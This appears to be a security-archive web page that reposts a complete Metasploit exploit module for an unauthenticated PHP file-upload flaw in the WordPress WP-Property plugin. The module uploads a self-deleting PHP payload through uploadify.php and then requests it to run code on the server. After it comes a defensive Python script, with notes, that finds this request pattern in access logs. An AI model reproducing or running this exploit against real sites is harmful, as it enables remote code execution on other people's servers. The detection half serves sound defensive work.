
WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. I mean msf.
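
From the defender's side, the request pattern in the module above (a POST to uploadify.php followed by a GET for a .php file in the same directory) can be searched for in web access logs. The following is an added example, not part of the original post or of Metasploit; the combined log format, the function name find_upload_abuse and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Path taken from the module on this page; everything else is an assumption.
UPLOADIFY_DIR = "/wp-content/plugins/wp-property/third-party/uploadify/"
UPLOADER = UPLOADIFY_DIR + "uploadify.php"

# Apache/nginx "combined" access-log prefix: ip, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jan/2013:19:41:12 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
198.51.100.7 - - [04/Jan/2013:19:41:13 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"
198.51.100.7 - - [04/Jan/2013:19:41:14 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/QwErT.php HTTP/1.1" 200 0 "-" "-"
192.0.2.10 - - [04/Jan/2013:19:42:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

def find_upload_abuse(log_text):
    """Return per-IP findings: POSTs to uploadify.php and later .php hits beside it."""
    posted = set()  # client IPs that have already POSTed to the uploader
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, method = m["ip"], m["method"]
        path = m["path"].split("?", 1)[0]  # ignore any query string
        if method == "POST" and path.endswith(UPLOADER):
            posted.add(ip)
            findings[ip].append(("upload-post", path, m["status"]))
        elif (ip in posted and UPLOADIFY_DIR in path
              and path.lower().endswith(".php") and not path.endswith(UPLOADER)):
            # A second PHP script requested from the upload directory by the uploader.
            findings[ip].append(("php-in-upload-dir", path, m["status"]))
    return dict(findings)

if __name__ == "__main__":
    for ip, events in find_upload_abuse(SAMPLE_LOG).items():
        for kind, path, status in events:
            print(ip, kind, status, path)
```

The module requests a payload that unlinks itself (`:unlink_self=>true`), so the uploaded file may no longer be on disk afterwards and the access log can be the only trace. The destination directory is sent as the `folder` form field in the POST body, which access logs do not record, so any POST to uploadify.php deserves review on its own.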